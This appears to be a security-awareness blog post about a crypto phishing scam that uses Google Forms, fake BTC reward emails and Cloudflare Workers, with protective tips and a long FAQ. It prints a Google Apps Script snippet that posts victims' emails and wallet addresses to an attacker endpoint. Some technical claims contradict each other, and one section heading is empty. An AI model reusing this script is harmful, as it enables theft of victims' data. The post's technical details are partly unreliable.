How are hackers using Google Forms to steal cryptocurrency in 2025?

Table of Contents

• What’s Happening? A New Kind of Crypto Scam
• Why This Attack Is So Dangerous
• Code Snippet from the Leaked Script
• Step-by-Step Flow of the Attack
• How Big Is This Campaign?
• How to Protect Yourself
• Conclusion
• Frequently Asked Questions (FAQs)

In a surprising twist, hackers are now using Google Forms — a tool widely trusted for surveys and quizzes — to steal cryptocurrency from unsuspecting users. What looks like a simple online form is actually a clever phishing trap designed to drain your digital wallet.

Let’s break down how this cyberattack works, why it’s effective, and what you can do to stay safe.

What’s Happening? A New Kind of Crypto Scam

Cybercriminals are exploiting Google Forms to create phishing links that look completely legitimate. Since these links originate from a trusted domain (forms.gle), they can bypass most spam filters and appear right in your inbox.

The Lure: “You Have 1.275 BTC Pending”

Victims receive an email that looks like it's from a well-known crypto exchange. It tells them they’ve won or earned 1.275 BTC (worth ₹60–₹70 lakhs in 2025). The email includes a link to a Google Form that appears to confirm the reward.

But it’s a trap.

Once the form is filled, users are redirected to a fake withdrawal portal that asks for their wallet address and a small “network fee” to process the transaction.

Within seconds, the attackers collect the data, and the crypto is gone — usually routed through mixer wallets to make it untraceable.

Why This Attack Is So Dangerous

1. It Uses Google’s Own Servers

Because the phishing emails come from Google’s trusted SMTP infrastructure, many email clients treat them as safe.

2. It Uses JavaScript Webhooks

The form doesn’t need to be fully submitted. A hidden Apps Script steals the entered information the moment you click “Submit.”

3. Cloudflare Workers Make It Invisible

All stolen data is silently sent to the attacker’s backend hosted behind Cloudflare Workers, which hides the source and destination.

Code Snippet from the Leaked Script

Here’s a simplified version of the malicious script used in the attack:

function onFormSubmit(e){
  const payload = JSON.stringify({
      email: e.namedValues['Email'][0],
      wallet: e.namedValues['Wallet Address'][0]
  });
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
      method: 'post',
      contentType: 'application/json',
      payload: payload
  });
}

This script runs immediately after form submission, sending user data directly to the attacker's control panel.

Step-by-Step Flow of the Attack

How Big Is This Campaign?

Kaspersky researchers identified a 63% spike in Google Forms-based phishing in July 2025, calling it one of the most effective low-tech social engineering attacks of the year.

How to Protect Yourself

✅ Be Skeptical of Free Crypto

No legitimate exchange will ask for wallet details via Google Forms. If it sounds too good to be true — it is.

✅ Quarantine Google Forms Emails

Admins should create email filtering rules to flag or quarantine any unexpected Google Form links.

✅ Use Browser Security Extensions

Install extensions that block suspicious JavaScript calls and Cloudflare Worker domains not on a trusted list.

✅ Educate Your Teams

Regular cybersecurity awareness training can help users recognize these phishing tactics before damage is done.

Conclusion

The use of Google Forms in this campaign shows just how crafty cybercriminals have become. They're no longer relying on sketchy links or spelling mistakes — they’re exploiting platforms people trust every day.

While the scam is simple, its success lies in trust and urgency. By impersonating legitimate crypto platforms and offering high rewards, attackers manipulate users into acting fast — and falling for the trap.

Stay alert. Never trust crypto giveaways. And remember: Google Forms aren’t for receiving Bitcoin.

FAQs

What is the new crypto scam involving Google Forms?

Hackers are using Google Forms to collect wallet addresses and personal data under the guise of a fake BTC reward offer.

Why is this scam so dangerous?

Because the form is hosted on Google’s domain, most users and spam filters trust it, making the scam hard to detect.

How does the phishing attack work?

The attacker sends a form link, collects data, and then redirects users to a fake site asking for a fee or private key.

What kind of data do hackers steal?

They collect email addresses, wallet addresses, and often trick users into paying network fees.

Can Google detect these malicious forms?

Google can detect them eventually, but most are live for several hours or days before takedown.

What are Cloudflare Workers in this context?

They’re used to hide the attacker’s backend infrastructure and anonymize the data collection process.

What is the role of JavaScript in this scam?

JavaScript webhooks in Google Apps Script forward stolen form data to the attacker’s server in real time.

Is this phishing technique new?

Using Google Forms this way is a newer variation of old phishing methods, made more effective by the trust in Google.

How many people have been affected by this?

While exact numbers vary, researchers report a 63% rise in such phishing forms in July 2025 alone.

Can antivirus software detect this?

Not always. Since the phishing link comes from a trusted domain, many tools fail to flag it.

What should I do if I filled one of these forms?

Immediately revoke access to any connected wallets, scan your system, and report the form to Google.

How can I identify a phishing Google Form?

Check for poor grammar, urgency-based messages, and unexpected rewards. Always verify the sender.

Is this scam targeting only crypto users?

Yes, primarily. The scam is designed around fake Bitcoin or crypto rewards to lure victims.

Are institutional investors at risk?

Yes, especially if their teams are not trained in phishing awareness and secure practices.

Are mobile users more at risk?

Often, yes. Mobile browsers may not show full URLs, making it harder to detect malicious links.

What are mixer wallets?

They’re used to hide the trail of stolen crypto funds by mixing them with others.

Can I track my stolen BTC?

It's difficult. Hackers often use mixers and cross-chain swaps to hide the trail.

Has Google responded to this threat?

Google takes action when reported, but many phishing forms slip through due to automation.

How can admins protect users?

By setting email rules to flag Google Form links and training users about these scams.

Are browser extensions helpful?

Yes, some can block known malicious scripts or unverified Cloudflare Worker endpoints.

Is this a global campaign?

Yes, reports suggest it's targeting users across North America, Europe, and Asia.

Can cybersecurity tools detect Cloudflare Worker phishing?

Some advanced threat detection systems can, but many consumer-grade tools cannot.

What email subjects are commonly used?

“1.275 BTC Pending Withdrawal” or “Action Required: Confirm Your Crypto Reward” are popular bait titles.

Should Google limit Forms features?

That’s debated, but many believe enhanced verification and abuse detection should be added.

What should crypto exchanges do?

Alert their users and blacklist these types of phishing domains using browser plugins.

What’s the best prevention method?

Avoid clicking unknown crypto reward links and educate yourself about phishing.

Are there any legal actions being taken?

Investigations are ongoing, but anonymity tools make attribution very hard.

Why is phishing still so effective in 2025?

Because social engineering evolves faster than user awareness or email protection.

Will 2FA protect my crypto wallet?

It helps, but if you manually send crypto to a scam address, 2FA won’t stop that.

What should I teach my team about this scam?

Tell them Google Forms can be weaponized and to treat any crypto offer with extreme caution.

Is reporting to Google effective?

Yes, it helps take the form down quickly, though damage may already be done.